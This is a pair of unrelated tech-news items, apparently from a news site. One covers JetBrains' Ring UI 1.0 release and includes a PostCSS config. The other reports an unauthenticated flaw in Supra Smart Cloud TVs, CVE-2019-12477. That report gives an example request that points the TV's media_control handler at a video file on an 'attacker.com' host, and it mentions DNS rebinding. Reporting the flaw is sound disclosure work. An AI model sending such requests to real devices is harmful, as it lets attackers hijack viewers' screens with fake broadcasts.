Ring UI 1.0 Library Released

Learn about new features and improvements of Jet Brains' open source library
28 September 2018   1969

JetBrains told about the release of the Ring UI 1.0 library. Updates have affected the support of Babel 7, the finalization of the visual language, customizable CSS properties, and the library home page has moved.

In addition, in the new version, the developers did:

  • most components moved to CSS;
  • "pop-up messages", "tabs" and "buttons-switches" components;
  • the ability to configure the list of browsers in which the application will work, thanks to the support of Babel 7.

Colors from the Ring UI can be used for the harmonious design of their application. To do this, you need to configure PostCSS as follows:

plugins: [
  ...
  require('postcss-custom-properties')({
    preserve: true,
    variables: require('@jetbrains/ring-ui/extract-css-vars')
  })
]

Changes in the visual language look like this:

Ring UI
Ring UI

At the end of July 2018, the company reported that its products would not support legacy license servers. Changes were made to the development environments of versions 2018.2.1 and .NET 2018.3 tools.

Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   354

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).